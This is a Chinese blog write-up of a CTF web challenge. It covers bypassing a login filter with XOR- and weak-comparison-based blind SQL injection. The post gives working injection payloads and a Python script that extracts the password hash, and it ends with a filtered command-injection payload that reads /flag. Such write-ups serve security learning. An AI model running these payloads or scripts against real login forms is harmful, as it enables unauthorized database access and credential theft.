[CTF]Web SQL绕过过滤注入(异或、弱比较注入)

最新推荐文章于 2024-08-11 19:48:42 发布
最新推荐文章于 2024-08-11 19:48:42 发布
阅读量2.1k 收藏 10
点赞数
分类专栏: WEB安全 文章标签: unctf sql web 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/111712453
版权

文章目录

前言

学习ctf记录,CTF Web SQL 绕过过滤注入

一、首先看题

提  示: !,!=,=,+,-,^,%
描  述: 全都过滤了绝望吗?

这里可以看到提示,似乎将许多关键字给过滤了,访问题目网站后,看到一个login登陆页面,结合题目分析应该是一个sql注入+绕过。

二、解题步骤

1、通过burpsuite抓取登陆包:

POST /login.php HTTP/1.1
Host: 1.1.1.1:13669
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:13669/
Cookie: PHPSESSID=3mh59vn5365oe4uvi2h4l9cuf2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

uname=admin&passwd=admin

通过修改uname,passwd可以得到不同的提示。
当 uname=admin时,提示 password error。
由此可知用户名为:admin

2、通过bp爆破passwd字段

常用的弱口令都尝试了一遍解不出来。

3、使用bp对uname字段进行sql fuzz

被过滤的字符
空格
or
and
union
order
,
*
|
+
&
--
#


未被过滤字符
select
left
ascii
mid
^
=
>
<
-
%

通过被过滤的字符来看,
union 联合查询使用不了了
and or 运算符也使用不了(同时|| && 符号运算也不行)

通过面向百度解题,找到几个方法:

4、注入方法

1、异或注入(^)

异或运算规则:
1^1=0 0^0=0 0^1=1
1^1^1=0 1^1^0=0

构造payload:admin'^ascii(mid(database(),1,1)=98)^'0
(不过逗号,也被过滤了,就是不能用mid)
payload:uname=admin'^1^((ascii(substr((select(passwd))from(1)))=99))^''^'&passwd=admin	

其他解法:
如果过滤了select和for
可以用
倒着看的第一位都是3,显然不行,无法截取出来,于是想到反转
先反转
REVERSE(MID((passwd)from(-%d))
再去最后一位
mid(REVERSE(MID((passwd)from(%-d)))from(-1))
在比较ASCII
ascii(mid(REVERSE(MID((passwd)from(%-d)))from(-1)))>1

2、通过sql语句弱比较进行注入

SQL中的减法 
admin'-(length(database())=3)-' 
字符串强制类型转换时会将admin转化为0
则:0-1-0=-1 没有结果 
当中间布尔型为00-0-0=0 
所有不以数字0开头的字符串都会被强制类型转换 
结果都为0

payload:uname=admin'-(ascii(substr((passwd)from(1)))=1)-'&passwd=admin

tip:提示下这是的passwd字段是猜出来的(猜不出怎么办?自己想办法吧)

通过第二个方法进行注入,写个python脚本跑一下:

import requests
import time


url = "http://1.1.1.1:13669/login.php"
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
#4dcc88f8f1bc05e7c2ad1a60288481a2
with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    for i in range(25,33):
        for j in range(48,127):
            sql = 'admin\'-(ascii(substr((select(passwd))from({0})))={1})-\''.format(i,j)
            #print(sql)
            data = {'uname':sql,'passwd':'admin'}
            try:
                res = s.post(url,data=data,timeout=5,headers=headers)
            except:
                #time.sleep(2)
                res = s.post(url,data=data,timeout=5,headers=headers)
            
            if 'username' in res.text:                
                database += chr(j)
                print(database)
                break
            res.close()

跑完得到结果:passwd:4dcc88f8f1bc05e7c2ad1a60288481a2

somd5一下:bugkuctf

5、登陆后台

登陆后台,是一个执行系统命令的界面,但是许多关键字都被过滤了。

payload:ord=a=$'\x20/flag'&&cat$a
\x20转换成字符串就是空格

最后拿到flag!!!

pandarking
关注
专栏目录
sql_fuzz-检测waf过滤关键字字典.txt
09-26
非常全面的SQL注入关键字检测字典,检测网站waf过滤了哪些关键字的字典,配合burpsuit使用非常有效。
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1663
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
SQL注入实战:mysql绕过
最新发布
moyuan_4s的博客
08-11 1205
(1)greatest(n1,n2,n3,...) //返回其中的最大值 (2)strcmp(str1,str2) //当str1=str2,返回0,当str1>str2,返回1,当str1
CTFweb学习记录 -- SQL注入检测绕过
lifanxin的博客
05-19 1013
SQL注入检测绕过概述大小写绕过双写绕过编码绕过内联注释绕过总结 概述   在学习了一些基本的sql注入知识以及注入技巧后,本篇博客将会总结一些常见的sql注入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到注入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过ctf比赛中十分
几道webCTF——命令绕过
辰星的博客
03-14 1265
第一题无回显类型 这里的exec函数会把参数cmd的值当做命令执行,并且没有任何过滤和限制。 对于这种无回显的题目,我们可以选择重定向符>来查看和获取信息。 我们先使用cmd=ls>info然后查看info来获取当前路径下的文件信息,如下: 发现flag.php,我们再次使用重定向符把其内容写入一个文件,再读取这个文件即可,即使用cmd=cat fl*>info,再次前往页面查...
buuctf10(异或注入&中文字符绕过preg_match&伪随机数漏洞seed)
weixin_63231007的博客
12-09 2015
在本题中假如路径是/index.php/config.php,浏览器的解析结果是index.php,这样才能执行index.php中的代码去包含文件,而basename会返回config.php,使得highlight_file显示出config.php的内容而不是原本的index.php,因为$_SERVER['PHP_SELF']的关系,就算后面有参数如?par=123&par2=333 而 $_SERVER[“PHP_SELF”] 的值为 /test/7ghost.php。
ctf 绕过php,浅析CTF绕过字符数字构造shell
weixin_32101285的博客
03-19 6852
原标题:浅析CTF绕过字符数字构造shell12/14本文字数3734前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflat...
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
siu~
10-25 831
1、RCE-原理-代码执行&命令执行 2、RCE-黑白盒-过滤绕过&不回显方案
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
CTF web安全经典例题讲解
10-22
综上所述,"CTF web安全经典例题讲解"是一个全面覆盖Web安全关键领域的学习资源,包括SQL注入的检测与防御、密码学基础应用、文件上传漏洞的识别与修复、Web权限提升的防范以及抓包改包技巧的实践。对于希望在网络...
SQL注入漏洞演示源代码
07-15
通过分析这些脚本,我们可以看到SQL查询是如何被拼接的,以及如何通过注入恶意SQL代码来绕过验证。 例如,一个常见的SQL注入漏洞场景可能是登录表单。正常情况下,用户输入的用户名和密码会被用于查询数据库中是否...
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 2142
只是总结一些常见的姿势,大佬轻喷。
CTF异或运算符的利用
m0_52923241的博客
08-08 2412
异或运算符简介 mysql异或运算符:^ 或者 xor; ^ xor 位异或 运算 逻辑 运算 如 1^1=0、 0^0=0、 0^1=1、1^1^1=0 、1^1^0=0、 1^2=3、 1^2=3 数字n xor 0会输出n;其他情况输出其他所有数据 异或运算规则:如果两个相应bit位相同,则结果为0,否则为1。 注释方法:‘ xxxx #、’ xxxx--+ 异或运算:可以取每个字符的ASCII,转成二进制再做运算,为了方便,copy一个脚本,通过查ASCII表的符合和
CTFWeb做题脚本
zip471642048的博客
01-06 1278
异或绕过过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用,同时过滤了字母和数字。但是特意留了个或运算符| php部分 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_
php 字符串异或 绕过,浅析CTF绕过字符数字构造shell
weixin_36349685的博客
03-19 1299
前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflate对webshell编码测试源码...
php异或绕过,CTF中php异或绕过preg_match
weixin_33397740的博客
04-03 2390
0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了,正好就当做一个笔记来记录一下。$hhh= @$_GET['_'];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die('One inch long, one inch strong!');}if ( preg_match('/[\x00- 0-9A-Za-z\'...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值